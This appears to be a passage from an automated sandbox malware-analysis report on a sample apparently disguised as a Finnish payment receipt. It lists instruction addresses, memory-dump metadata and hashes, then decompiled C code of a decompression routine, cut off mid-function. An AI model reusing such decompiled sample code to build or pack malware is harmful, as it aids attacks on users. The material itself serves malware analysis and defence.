                                                                                                                      0x00406d00
                                                                                                                      0x00406d03
                                                                                                                      0x00406d06
                                                                                                                      0x00406d09
                                                                                                                      0x00406d0c
                                                                                                                      0x00406d0f
                                                                                                                      0x00406d12
                                                                                                                      0x00406d15
                                                                                                                      0x00406d18
                                                                                                                      0x00406d1b
                                                                                                                      0x00406d33
                                                                                                                      0x00406d36
                                                                                                                      0x00406d39
                                                                                                                      0x00406d3c
                                                                                                                      0x00406d3f
                                                                                                                      0x00406d43
                                                                                                                      0x00406d45
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d25
                                                                                                                      0x00406d2a
                                                                                                                      0x00406d2c
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d48
                                                                                                                      0x00406d4f
                                                                                                                      0x00406d52
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe5
                                                                                                                      0x0040730c
                                                                                                                      0x00000000
                                                                                                                      0x0040730c
                                                                                                                      0x00406feb
                                                                                                                      0x00406fee
                                                                                                                      0x00406ff1
                                                                                                                      0x00406ff5
                                                                                                                      0x00406ff8
                                                                                                                      0x00406ffe
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407003
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406db1
                                                                                                                      0x00406db1
                                                                                                                      0x00406db4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070f0
                                                                                                                      0x004070f4
                                                                                                                      0x00407116
                                                                                                                      0x00407119
                                                                                                                      0x00407123
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x004070f6
                                                                                                                      0x004070f9
                                                                                                                      0x004070fd
                                                                                                                      0x00407100
                                                                                                                      0x00407100
                                                                                                                      0x00407103
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071ad
                                                                                                                      0x004071b1
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071d6
                                                                                                                      0x004071dd
                                                                                                                      0x004071e4
                                                                                                                      0x004071e4
                                                                                                                      0x00000000
                                                                                                                      0x004071e4
                                                                                                                      0x004071b3
                                                                                                                      0x004071b6
                                                                                                                      0x004071b9
                                                                                                                      0x004071bc
                                                                                                                      0x004071c3
                                                                                                                      0x00407107
                                                                                                                      0x00407107
                                                                                                                      0x0040710a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040729e
                                                                                                                      0x004072a1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406ed8
                                                                                                                      0x00406eda
                                                                                                                      0x00406ee1
                                                                                                                      0x00406ee2
                                                                                                                      0x00406ee4
                                                                                                                      0x00406ee7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406eef
                                                                                                                      0x00406ef2
                                                                                                                      0x00406ef5
                                                                                                                      0x00406ef7
                                                                                                                      0x00406ef9
                                                                                                                      0x00406ef9
                                                                                                                      0x00406efa
                                                                                                                      0x00406efd
                                                                                                                      0x00406f04
                                                                                                                      0x00406f07
                                                                                                                      0x00406f15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071eb
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071fa
                                                                                                                      0x004071fa
                                                                                                                      0x004071fe
                                                                                                                      0x00407336
                                                                                                                      0x00000000
                                                                                                                      0x00407336
                                                                                                                      0x00407204
                                                                                                                      0x00407207
                                                                                                                      0x0040720a
                                                                                                                      0x0040720e
                                                                                                                      0x00407211
                                                                                                                      0x00407217
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x0040721c
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x00407222
                                                                                                                      0x00407222
                                                                                                                      0x00407226
                                                                                                                      0x00407286
                                                                                                                      0x00407289
                                                                                                                      0x0040728e
                                                                                                                      0x0040728f
                                                                                                                      0x00407291
                                                                                                                      0x00407293
                                                                                                                      0x00407296
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x004071a2
                                                                                                                      0x00407228
                                                                                                                      0x0040722e
                                                                                                                      0x00407231
                                                                                                                      0x00407234
                                                                                                                      0x00407237
                                                                                                                      0x0040723a
                                                                                                                      0x0040723d
                                                                                                                      0x00407240
                                                                                                                      0x00407243
                                                                                                                      0x00407246
                                                                                                                      0x00407249
                                                                                                                      0x00407262
                                                                                                                      0x00407265
                                                                                                                      0x00407268
                                                                                                                      0x0040726b
                                                                                                                      0x0040726f
                                                                                                                      0x00407271
                                                                                                                      0x00407271
                                                                                                                      0x00407272
                                                                                                                      0x00407275
                                                                                                                      0x0040724b
                                                                                                                      0x0040724b
                                                                                                                      0x00407253
                                                                                                                      0x00407258
                                                                                                                      0x0040725a
                                                                                                                      0x0040725d
                                                                                                                      0x0040725d
                                                                                                                      0x00407278
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00407340
                                                                                                                      0x00407346
                                                                                                                      0x00407348
                                                                                                                      0x0040734f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                      • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                                                      • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                      • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00406D59() {
                                                                                                                      				signed int _t539;
                                                                                                                      				unsigned short _t540;
                                                                                                                      				signed int _t541;
                                                                                                                      				void _t542;
                                                                                                                      				signed int _t543;
                                                                                                                      				signed int _t544;
                                                                                                                      				signed int _t573;
                                                                                                                      				signed int _t576;
                                                                                                                      				signed int _t597;
                                                                                                                      				signed int* _t614;
                                                                                                                      				void* _t621;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t621 - 0x40) != 1) {
                                                                                                                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                      						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                      						 *(_t621 - 0x58) = _t539;
                                                                                                                      						goto L68;
                                                                                                                      					} else {
                                                                                                                      						 *(__ebp - 0x84) = 8;
                                                                                                                      						while(1) {
                                                                                                                      							L132:
                                                                                                                      							 *(_t621 - 0x54) = _t614;
                                                                                                                      							while(1) {
                                                                                                                      								L133:
                                                                                                                      								_t540 =  *_t614;
                                                                                                                      								_t597 = _t540 & 0x0000ffff;
                                                                                                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                      								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                      									 *(_t621 - 0x40) = 1;
                                                                                                                      									_t541 = _t540 - (_t540 >> 5);
                                                                                                                      									 *_t614 = _t541;
                                                                                                                      								} else {
                                                                                                                      									 *(_t621 - 0x10) = _t573;
                                                                                                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                      								}
                                                                                                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                      									goto L139;
                                                                                                                      								}
                                                                                                                      								L137:
                                                                                                                      								if( *(_t621 - 0x6c) == 0) {
                                                                                                                      									 *(_t621 - 0x88) = 5;
                                                                                                                      									L170:
                                                                                                                      									_t576 = 0x22;
                                                                                                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                      									_t544 = 0;
                                                                                                                      									L172:
                                                                                                                      									return _t544;
                                                                                                                      								}
                                                                                                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                      								L139:
                                                                                                                      								_t542 =  *(_t621 - 0x84);
                                                                                                                      								while(1) {
                                                                                                                      									 *(_t621 - 0x88) = _t542;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t543 =  *(_t621 - 0x88);
                                                                                                                      										if(_t543 > 0x1c) {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M0040735D))) {
                                                                                                                      											case 0:
                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                      												_t543 =  *( *(_t621 - 0x70));
                                                                                                                      												if(_t543 > 0xe1) {
                                                                                                                      													goto L171;
                                                                                                                      												}
                                                                                                                      												_t547 = _t543 & 0x000000ff;
                                                                                                                      												_push(0x2d);
                                                                                                                      												asm("cdq");
                                                                                                                      												_pop(_t578);
                                                                                                                      												_push(9);
                                                                                                                      												_pop(_t579);
                                                                                                                      												_t617 = _t547 / _t578;
                                                                                                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                      												asm("cdq");
                                                                                                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                      												 *(_t621 - 0x3c) = _t612;
                                                                                                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                      													L10:
                                                                                                                      													if(_t620 == 0) {
                                                                                                                      														L12:
                                                                                                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                      														goto L15;
                                                                                                                      													} else {
                                                                                                                      														goto L11;
                                                                                                                      													}
                                                                                                                      													do {
                                                                                                                      														L11:
                                                                                                                      														_t620 = _t620 - 1;
                                                                                                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                      													} while (_t620 != 0);
                                                                                                                      													goto L12;
                                                                                                                      												}
                                                                                                                      												if( *(_t621 - 4) != 0) {
                                                                                                                      													GlobalFree( *(_t621 - 4));
                                                                                                                      												}
                                                                                                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      												 *(_t621 - 4) = _t543;
                                                                                                                      												if(_t543 == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												} else {
                                                                                                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                      													goto L10;
                                                                                                                      												}
                                                                                                                      											case 1:
                                                                                                                      												L13:
                                                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                      													 *(_t621 - 0x88) = 1;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                      												_t45 = _t621 - 0x48;
                                                                                                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                      												__eflags =  *_t45;
                                                                                                                      												L15:
                                                                                                                      												if( *(_t621 - 0x48) < 4) {
                                                                                                                      													goto L13;
                                                                                                                      												}
                                                                                                                      												_t555 =  *(_t621 - 0x40);
                                                                                                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                      													L20:
                                                                                                                      													 *(_t621 - 0x48) = 5;
                                                                                                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                      													goto L23;
                                                                                                                      												}
                                                                                                                      												 *(_t621 - 0x74) = _t555;
                                                                                                                      												if( *(_t621 - 8) != 0) {
                                                                                                                      													GlobalFree( *(_t621 - 8));
                                                                                                                      												}
                                                                                                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                      												 *(_t621 - 8) = _t543;
                                                                                                                      												if(_t543 == 0) {
                                                                                                                      													goto L171;
                                                                                                                      												} else {
                                                                                                                      													goto L20;
                                                                                                                      												}
                                                                                                                      											case 2:
                                                                                                                      												L24:
                                                                                                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                      												 *(_t621 - 0x84) = 6;
                                                                                                                      												 *(_t621 - 0x4c) = _t562;
                                                                                                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                      												goto L132;
                                                                                                                      											case 3:
                                                                                                                      												L21:
                                                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                                                      													 *(_t621 - 0x88) = 3;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                      												_t67 = _t621 - 0x70;
                                                                                                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                      												__eflags =  *_t67;
                                                                                                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                      												L23:
                                                                                                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                      												if( *(_t621 - 0x48) != 0) {
                                                                                                                      													goto L21;
                                                                                                                      												}
                                                                                                                      												goto L24;
                                                                                                                      											case 4:
                                                                                                                      												L133:
                                                                                                                      												_t540 =  *_t614;
                                                                                                                      												_t597 = _t540 & 0x0000ffff;
                                                                                                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                      												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                      													 *(_t621 - 0x40) = 1;
                                                                                                                      													_t541 = _t540 - (_t540 >> 5);
                                                                                                                      													 *_t614 = _t541;
                                                                                                                      												} else {
                                                                                                                      													 *(_t621 - 0x10) = _t573;
                                                                                                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                      												}
                                                                                                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                      													goto L139;
                                                                                                                      												}
                                                                                                                      											case 5:
                                                                                                                      												goto L137;
                                                                                                                      											case 6:
                                                                                                                      												__edx = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      													L132:
                                                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                                                      												__cl = 8;
                                                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      														_t98 = __ebp - 0x38;
                                                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      														__eflags =  *_t98;
                                                                                                                      													} else {
                                                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                                                      													__ebx = 0;
                                                                                                                      													__ebx = 1;
                                                                                                                      													goto L61;
                                                                                                                      												} else {
                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      														__eflags = __eax;
                                                                                                                      													}
                                                                                                                      													__ecx =  *(__ebp - 8);
                                                                                                                      													__ebx = 0;
                                                                                                                      													__ebx = 1;
                                                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
